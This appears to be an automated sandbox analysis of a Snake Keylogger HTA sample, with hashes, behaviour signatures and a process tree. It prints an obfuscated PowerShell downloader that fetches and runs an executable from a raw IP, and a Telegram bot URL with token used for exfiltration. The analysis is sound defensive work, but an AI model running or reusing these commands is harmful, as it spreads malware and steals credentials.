Analysis
-
max time kernel
16s -
max time network
112s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
16-10-2024 01:41
Static task
static1
Behavioral task
behavioral1
Sample
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta
Resource
win10v2004-20241007-en
General
-
Target
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta
-
Size
165KB
-
MD5
44ad3c49b38f4f6f1739baf86d528fd3
-
SHA1
afcf27df0ee2373846a1f6b8027e9cfcea77c486
-
SHA256
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368
-
SHA512
e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691
-
SSDEEP
96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/2100-36-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2100-35-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2100-34-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2252 PoweRsHELl.ExE -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2892 powershell.exe 2252 PoweRsHELl.ExE -
Executes dropped EXE 1 IoCs
pid Process 1392 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 2252 PoweRsHELl.ExE -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0035000000016140-31.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1392 set thread context of 2100 1392 taskhostw.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PoweRsHELl.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2252 PoweRsHELl.ExE 2892 powershell.exe 2252 PoweRsHELl.ExE 2252 PoweRsHELl.ExE 2100 RegSvcs.exe 2100 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1392 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2252 PoweRsHELl.ExE Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 2100 RegSvcs.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2908 wrote to memory of 2252 2908 mshta.exe 30 PID 2908 wrote to memory of 2252 2908 mshta.exe 30 PID 2908 wrote to memory of 2252 2908 mshta.exe 30 PID 2908 wrote to memory of 2252 2908 mshta.exe 30 PID 2252 wrote to memory of 2892 2252 PoweRsHELl.ExE 32 PID 2252 wrote to memory of 2892 2252 PoweRsHELl.ExE 32 PID 2252 wrote to memory of 2892 2252 PoweRsHELl.ExE 32 PID 2252 wrote to memory of 2892 2252 PoweRsHELl.ExE 32 PID 2252 wrote to memory of 2856 2252 PoweRsHELl.ExE 33 PID 2252 wrote to memory of 2856 2252 PoweRsHELl.ExE 33 PID 2252 wrote to memory of 2856 2252 PoweRsHELl.ExE 33 PID 2252 wrote to memory of 2856 2252 PoweRsHELl.ExE 33 PID 2856 wrote to memory of 2776 2856 csc.exe 34 PID 2856 wrote to memory of 2776 2856 csc.exe 34 PID 2856 wrote to memory of 2776 2856 csc.exe 34 PID 2856 wrote to memory of 2776 2856 csc.exe 34 PID 2252 wrote to memory of 1392 2252 PoweRsHELl.ExE 36 PID 2252 wrote to memory of 1392 2252 PoweRsHELl.ExE 36 PID 2252 wrote to memory of 1392 2252 PoweRsHELl.ExE 36 PID 2252 wrote to memory of 1392 2252 PoweRsHELl.ExE 36 PID 1392 wrote to memory of 2100 1392 taskhostw.exe 37 PID 1392 wrote to memory of 2100 1392 taskhostw.exe 37 PID 1392 wrote to memory of 2100 1392 taskhostw.exe 37 PID 1392 wrote to memory of 2100 1392 taskhostw.exe 37 PID 1392 wrote to memory of 2100 1392 taskhostw.exe 37 PID 1392 wrote to memory of 2100 1392 taskhostw.exe 37 PID 1392 wrote to memory of 2100 1392 taskhostw.exe 37 PID 1392 wrote to memory of 2100 1392 taskhostw.exe 37 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE"C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_99j9dfn.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6BC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA6BB.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2776
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2100
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ed2baaffc4fc083f868c04c033c7a66d
SHA11a25db2a8ea9acad652a0762a98187dd59c06569
SHA256158739f824ae8962a3fdcefd28378a9609b7fad46690b8b1921d7fb2916cff0a
SHA512e46c3fe4328f3b42845b8ac86ee21bd28cc38a2e261c390f81ea83b7a45de33c01b2c0376ea4602cbf451f68e8cda129e81ed4da280a6a4d6f57d61d232b387b
-
Filesize
3KB
MD52ea51eefa730542821fd43a352c193b4
SHA1fea0eb88d22d35b16e0ee79e28e5a2134cec1650
SHA2568ca6b70d0e7706fa03a4808cf3643eb9870bbc7d0a8e09e371e1e08e126420d8
SHA512670384971c88b162efb250c5aef1aa81a3ad509344051c4bf9255d2e67b3c296ef9908431733127a30c6f1a7e1276cd0f7c169fa6297aa4f2e894e6502a5bf2f
-
Filesize
7KB
MD5b7ba7fdf0ab8286e9039693f6d582d80
SHA11a7b717fe061c656dd7b33501add0a33edab9ef9
SHA256a4a958148add2d50d8c545641d0abe4823e6824092c82619f01a3db1a7c4c3b5
SHA5127ca66f30eec0caeb5e99c102509ea1b38957be36b66c3657e1f4d66deff4c3a414c334f2dc811b93b5f6b3bf37db803ebd537e26ecfe4aef50be78f821e80d5f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56093d9d65098cad1a18f64e698d15d64
SHA1785b2728821e483ce886306c5c09cef431dba41e
SHA256fcb9dac2d9d9ba8b84495fd817780b22a80b1ee109d44e7d2c2c08a334b933b2
SHA512d2ffc707af256c5de051434baa8c733567b72956e682091b48486d9e93df60ea8f812e0b0dcecea9a1c4d02c1d457ee2582764e25adb6ec64e73356e96b1d486
-
Filesize
948KB
MD53e2f27edd3deacd8f08f6ed1133b2040
SHA1060e3218949c5a006bb8607e8228e6539b737bfb
SHA256163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86
SHA512da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42
-
Filesize
652B
MD5cd4b415852ddd09d6e7d143d0a00f56d
SHA16fad24bc27d4e5c8f590f34c1910507b5b3f8f9a
SHA256ad16e1d3a0b09073b10837e6a923965dcf72a374cc30bbfd8cc651e3db41d896
SHA5125260fa480bc4c81d7165bf27ea7464952192bd063b56301646a22411da452622768b4aca6c3eaea449a2ae7e627c3ea5c19c4320e8c5eed9bbc545b5d11540e3
-
Filesize
475B
MD5ecc2c10cb4c5954e2d5156bce54e41f4
SHA12d7cde31f9942c1dc80c493c03d675962991bf31
SHA25621d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac
SHA512bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96
-
Filesize
309B
MD5a1afc9ecf40afd1c5576603a221009c1
SHA174d4eea41de07b2aaf098f37ebe86f470189ced3
SHA2561cf344dbc2e6dd2b6c4bd43a47c68ad30681e935e9d579e3bd7e491de5faa865
SHA5128b11fc8c9000f22b3379d73c6cda66661d5b2c0725d133346984121f38d442e85218f06d502c0bf0bc9505e8d6a391289e539c94f48a9feeec922ea016775efb